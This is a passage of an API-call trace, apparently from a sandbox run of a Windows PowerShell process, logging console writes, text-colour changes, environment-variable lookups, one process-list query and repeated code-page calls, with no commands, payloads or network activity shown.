returned 1 [0167.557] GetConsoleMode (in: hConsoleHandle=0xf, lpMode=0x5a0e2ac | out: lpMode=0x5a0e2ac) returned 1 [0167.558] WriteConsoleW (in: hConsoleOutput=0xf, lpBuffer=0x22e1700*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x5a0e2a0, lpReserved=0x0 | out: lpBuffer=0x22e1700*, lpNumberOfCharsWritten=0x5a0e2a0*=0x1) returned 1 [0167.558] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e2b0 | out: lpConsoleScreenBufferInfo=0x5a0e2b0) returned 1 [0167.558] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e248 | out: lpConsoleScreenBufferInfo=0x5a0e248) returned 1 [0167.559] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e248 | out: lpConsoleScreenBufferInfo=0x5a0e248) returned 1 [0167.559] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e250 | out: lpConsoleScreenBufferInfo=0x5a0e250) returned 1 [0167.559] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0xc) returned 1 [0167.560] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e250 | out: lpConsoleScreenBufferInfo=0x5a0e250) returned 1 [0167.560] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0xc) returned 1 [0167.560] GetConsoleMode (in: hConsoleHandle=0xf, lpMode=0x5a0e26c | out: lpMode=0x5a0e26c) returned 1 [0167.561] WriteConsoleW (in: hConsoleOutput=0xf, lpBuffer=0x26b733c*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x5a0e260, lpReserved=0x0 | out: lpBuffer=0x26b733c*, lpNumberOfCharsWritten=0x5a0e260*=0x1a) returned 1 [0167.561] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e24c | out: lpConsoleScreenBufferInfo=0x5a0e24c) returned 1 [0167.562] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0x7) returned 1 [0167.562] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e24c | out: lpConsoleScreenBufferInfo=0x5a0e24c) returned 1 [0167.562] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0x7) returned 1 [0167.563] GetConsoleMode (in: hConsoleHandle=0xf, lpMode=0x5a0e2ac | out: lpMode=0x5a0e2ac) returned 1 [0167.563] WriteConsoleW (in: hConsoleOutput=0xf, lpBuffer=0x22e1700*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x5a0e2a0, lpReserved=0x0 | out: lpBuffer=0x22e1700*, lpNumberOfCharsWritten=0x5a0e2a0*=0x1) returned 1 [0167.563] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e2b0 | out: lpConsoleScreenBufferInfo=0x5a0e2b0) returned 1 [0167.564] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e248 | out: lpConsoleScreenBufferInfo=0x5a0e248) returned 1 [0167.564] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e248 | out: lpConsoleScreenBufferInfo=0x5a0e248) returned 1 [0167.564] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e250 | out: lpConsoleScreenBufferInfo=0x5a0e250) returned 1 [0167.565] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0xc) returned 1 [0167.565] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e250 | out: lpConsoleScreenBufferInfo=0x5a0e250) returned 1 [0167.565] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0xc) returned 1 [0167.566] GetConsoleMode (in: hConsoleHandle=0xf, lpMode=0x5a0e26c | out: lpMode=0x5a0e26c) returned 1 [0167.566] WriteConsoleW (in: hConsoleOutput=0xf, lpBuffer=0x26b794c*, nNumberOfCharsToWrite=0x4f, lpNumberOfCharsWritten=0x5a0e260, lpReserved=0x0 | out: lpBuffer=0x26b794c*, lpNumberOfCharsWritten=0x5a0e260*=0x4f) returned 1 [0167.566] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e24c | out: lpConsoleScreenBufferInfo=0x5a0e24c) returned 1 [0167.567] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0x7) returned 1 [0167.567] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e24c | out: lpConsoleScreenBufferInfo=0x5a0e24c) returned 1 [0167.567] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0x7) returned 1 [0167.568] GetConsoleMode (in: hConsoleHandle=0xf, lpMode=0x5a0e2ac | out: lpMode=0x5a0e2ac) returned 1 [0167.568] WriteConsoleW (in: hConsoleOutput=0xf, lpBuffer=0x22e1700*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x5a0e2a0, lpReserved=0x0 | out: lpBuffer=0x22e1700*, lpNumberOfCharsWritten=0x5a0e2a0*=0x1) returned 1 [0167.568] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e2b0 | out: lpConsoleScreenBufferInfo=0x5a0e2b0) returned 1 [0167.579] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e248 | out: lpConsoleScreenBufferInfo=0x5a0e248) returned 1 [0167.579] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e248 | out: lpConsoleScreenBufferInfo=0x5a0e248) returned 1 [0167.579] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e250 | out: lpConsoleScreenBufferInfo=0x5a0e250) returned 1 [0167.580] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0xc) returned 1 [0167.580] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e250 | out: lpConsoleScreenBufferInfo=0x5a0e250) returned 1 [0167.580] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0xc) returned 1 [0167.581] GetConsoleMode (in: hConsoleHandle=0xf, lpMode=0x5a0e26c | out: lpMode=0x5a0e26c) returned 1 [0167.581] WriteConsoleW (in: hConsoleOutput=0xf, lpBuffer=0x26b7b38*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x5a0e260, lpReserved=0x0 | out: lpBuffer=0x26b7b38*, lpNumberOfCharsWritten=0x5a0e260*=0x1e) returned 1 [0167.581] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e24c | out: lpConsoleScreenBufferInfo=0x5a0e24c) returned 1 [0167.582] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0x7) returned 1 [0167.582] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e24c | out: lpConsoleScreenBufferInfo=0x5a0e24c) returned 1 [0167.582] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0x7) returned 1 [0167.583] GetConsoleMode (in: hConsoleHandle=0xf, lpMode=0x5a0e2ac | out: lpMode=0x5a0e2ac) returned 1 [0167.583] WriteConsoleW (in: hConsoleOutput=0xf, lpBuffer=0x22e1700*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x5a0e2a0, lpReserved=0x0 | out: lpBuffer=0x22e1700*, lpNumberOfCharsWritten=0x5a0e2a0*=0x1) returned 1 [0167.583] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e2b0 | out: lpConsoleScreenBufferInfo=0x5a0e2b0) returned 1 [0167.584] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e248 | out: lpConsoleScreenBufferInfo=0x5a0e248) returned 1 [0167.584] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e248 | out: lpConsoleScreenBufferInfo=0x5a0e248) returned 1 [0167.585] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e250 | out: lpConsoleScreenBufferInfo=0x5a0e250) returned 1 [0167.585] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0xc) returned 1 [0167.585] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e250 | out: lpConsoleScreenBufferInfo=0x5a0e250) returned 1 [0167.586] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0xc) returned 1 [0167.586] GetConsoleMode (in: hConsoleHandle=0xf, lpMode=0x5a0e26c | out: lpMode=0x5a0e26c) returned 1 [0167.586] WriteConsoleW (in: hConsoleOutput=0xf, lpBuffer=0x26b5fd0*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x5a0e260, lpReserved=0x0 | out: lpBuffer=0x26b5fd0*, lpNumberOfCharsWritten=0x5a0e260*=0x1) returned 1 [0167.587] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e24c | out: lpConsoleScreenBufferInfo=0x5a0e24c) returned 1 [0167.587] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0x7) returned 1 [0167.587] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e24c | out: lpConsoleScreenBufferInfo=0x5a0e24c) returned 1 [0167.588] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0x7) returned 1 [0167.588] GetConsoleMode (in: hConsoleHandle=0xf, lpMode=0x5a0e2ac | out: lpMode=0x5a0e2ac) returned 1 [0167.588] WriteConsoleW (in: hConsoleOutput=0xf, lpBuffer=0x22e1700*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x5a0e2a0, lpReserved=0x0 | out: lpBuffer=0x22e1700*, lpNumberOfCharsWritten=0x5a0e2a0*=0x1) returned 1 [0167.589] EtwEventActivityIdControl () returned 0x0 [0167.589] EtwEventActivityIdControl () returned 0x0 [0167.589] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e4e8, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0167.590] EtwEventActivityIdControl () returned 0x0 [0167.590] EtwEventActivityIdControl () returned 0x0 [0167.590] EtwEventActivityIdControl () returned 0x0 [0167.590] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3289540, Length=0x20000, ResultLength=0x5a0e6e4 | out: SystemInformation=0x3289540, ResultLength=0x5a0e6e4*=0xca30) returned 0x0 [0167.625] EtwEventActivityIdControl () returned 0x0 [0167.625] EtwEventActivityIdControl () returned 0x0 [0167.625] EtwEventActivityIdControl () returned 0x0 [0167.626] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0d58c, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0167.626] EtwEventActivityIdControl () returned 0x0 [0167.626] EtwEventActivityIdControl () returned 0x0 [0167.626] EtwEventActivityIdControl () returned 0x0 [0167.627] EtwEventActivityIdControl () returned 0x0 [0167.627] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x55c [0167.628] EtwEventActivityIdControl () returned 0x0 [0167.628] EtwEventActivityIdControl () returned 0x0 [0167.628] EtwEventActivityIdControl () returned 0x0 [0167.628] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0cea8, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0167.629] EtwEventActivityIdControl () returned 0x0 [0167.629] EtwEventActivityIdControl () returned 0x0 [0167.629] EtwEventActivityIdControl () returned 0x0 [0167.629] EtwEventActivityIdControl () returned 0x0 [0167.629] EtwEventActivityIdControl () returned 0x0 [0167.629] EtwEventActivityIdControl () returned 0x0 [0167.629] EtwEventActivityIdControl () returned 0x0 [0167.629] EtwEventActivityIdControl () returned 0x0 [0167.629] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0dd5c | out: lpConsoleScreenBufferInfo=0x5a0dd5c) returned 1 [0167.631] EtwEventActivityIdControl () returned 0x0 [0167.631] EtwEventActivityIdControl () returned 0x0 [0167.631] EtwEventActivityIdControl () returned 0x0 [0167.631] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0d58c, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0167.632] EtwEventActivityIdControl () returned 0x0 [0167.632] EtwEventActivityIdControl () returned 0x0 [0167.632] EtwEventActivityIdControl () returned 0x0 [0167.633] EtwEventActivityIdControl () returned 0x0 [0167.633] EtwEventActivityIdControl () returned 0x0 [0167.633] EtwEventActivityIdControl () returned 0x0 [0167.634] EtwEventActivityIdControl () returned 0x0 [0167.634] EtwEventActivityIdControl () returned 0x0 [0167.634] EtwEventActivityIdControl () returned 0x0 [0167.634] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0d58c, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0167.635] EtwEventActivityIdControl () returned 0x0 [0167.635] EtwEventActivityIdControl () returned 0x0 [0167.635] EtwEventActivityIdControl () returned 0x0 [0167.635] EtwEventActivityIdControl () returned 0x0 [0167.636] EtwEventActivityIdControl () returned 0x0 [0167.636] EtwEventActivityIdControl () returned 0x0 [0167.636] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e358 | out: lpConsoleScreenBufferInfo=0x5a0e358) returned 1 [0167.636] GetConsoleOutputCP () returned 0x1b5 [0167.637] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.637] GetConsoleOutputCP () returned 0x1b5 [0167.637] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.637] GetConsoleOutputCP () returned 0x1b5 [0167.637] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.637] GetConsoleOutputCP () returned 0x1b5 [0167.637] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.637] GetConsoleOutputCP () returned 0x1b5 [0167.638] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.638] GetConsoleOutputCP () returned 0x1b5 [0167.638] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.638] GetConsoleOutputCP () returned 0x1b5 [0167.638] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.638] GetConsoleOutputCP () returned 0x1b5 [0167.638] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.638] GetConsoleOutputCP () returned 0x1b5 [0167.639] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.639] GetConsoleOutputCP () returned 0x1b5 [0167.639] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.639] GetConsoleOutputCP () returned 0x1b5 [0167.639] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.639] GetConsoleOutputCP () returned 0x1b5 [0167.639] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.639] GetConsoleOutputCP () returned 0x1b5 [0167.640] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.640] GetConsoleOutputCP () returned 0x1b5 [0167.640] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.640] GetConsoleOutputCP () returned 0x1b5 [0167.641] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.641] GetConsoleOutputCP () returned 0x1b5 [0167.641] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.641] GetConsoleOutputCP () returned 0x1b5 [0167.641] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.641] GetConsoleOutputCP () returned 0x1b5 [0167.641] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.641] GetConsoleOutputCP () returned 0x1b5 [0167.642] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.642] GetConsoleOutputCP () returned 0x1b5 [0167.642] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.642] GetConsoleOutputCP () returned 0x1b5 [0167.642] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.642] GetConsoleOutputCP () returned 0x1b5 [0167.642] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.642] GetConsoleOutputCP () returned 0x1b5 [0167.642] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.642] GetConsoleOutputCP () returned 0x1b5 [0167.643] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.643] GetConsoleOutputCP () returned 0x1b5 [0167.643] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.643] GetConsoleOutputCP () returned 0x1b5 [0167.643] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.643] GetConsoleOutputCP () returned 0x1b5 [0167.644] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.644] GetConsoleOutputCP () returned 0x1b5 [0167.644] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.644] GetConsoleOutputCP () returned 0x1b5 [0167.644] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.644] GetConsoleOutputCP () returned 0x1b5 [0167.644] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.644] GetConsoleOutputCP () returned 0x1b5 [0167.645] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.645] GetConsoleOutputCP () returned 0x1b5 [0167.645] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.645] GetConsoleOutputCP () returned 0x1b5 [0167.645] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.645] GetConsoleOutputCP () returned 0x1b5 [0167.645] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.645] GetConsoleOutputCP () returned 0x1b5 [0167.646] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.646] GetConsoleOutputCP () returned 0x1b5 [0167.646] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.646] GetConsoleOutputCP () returned 0x1b5 [0167.646] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.646] GetConsoleOutputCP () returned 0x1b5 [0167.646] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.646] GetConsoleOutputCP () returned 0x1b5 [0167.646] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.647] GetConsoleOutputCP () returned 0x1b5 [0167.647] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.647] GetConsoleOutputCP () returned 0x1b5 [0167.647] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.647] GetConsoleOutputCP () returned 0x1b5 [0167.647] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.647] GetConsoleOutputCP () returned 0x1b5 [0167.647] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.647] GetConsoleOutputCP () returned 0x1b5 [0167.648] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.648] GetConsoleOutputCP () returned 0x1b5 [0167.648] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.648] GetConsoleOutputCP () returned 0x1b5 [0167.648] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.648] GetConsoleOutputCP () returned 0x1b5 [0167.648] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.648] GetConsoleOutputCP () returned 0x1b5 [0167.649] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.649] GetConsoleOutputCP () returned 0x1b5 [0167.649] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.649] GetConsoleOutputCP () returned 0x1b5 [0167.649] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.649] GetConsoleOutputCP () returned 0x1b5 [0167.649] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.649] GetConsoleOutputCP () returned 0x1b5 [0167.650] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.650] GetConsoleOutputCP () returned 0x1b5 [0167.650] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.650] GetConsoleOutputCP () returned 0x1b5 [0167.650] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.650] GetConsoleOutputCP () returned 0x1b5 [0167.650] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.650] GetConsoleOutputCP () returned 0x1b5 [0167.651] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.651] GetConsoleOutputCP () returned 0x1b5 [0167.651] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.651] GetConsoleOutputCP () returned 0x1b5 [0167.651] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.651] GetConsoleOutputCP () returned 0x1b5 [0167.651] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.651] GetConsoleOutputCP () returned 0x1b5 [0167.652] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.652] GetConsoleOutputCP () returned 0x1b5 [0167.652] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.652] GetConsoleOutputCP () returned 0x1b5 [0167.652] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.652] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e2b0 | out: lpConsoleScreenBufferInfo=0x5a0e2b0) returned 1 [0167.652] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e248 | out: lpConsoleScreenBufferInfo=0x5a0e248) returned 1 [0167.654] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e248 | out: lpConsoleScreenBufferInfo=0x5a0e248) returned 1 [0167.654] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e250 | out: lpConsoleScreenBufferInfo=0x5a0e250) returned 1 [0167.655] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0xc) returned 1 [0167.655] GetConsoleScreenBufferInfo (in: 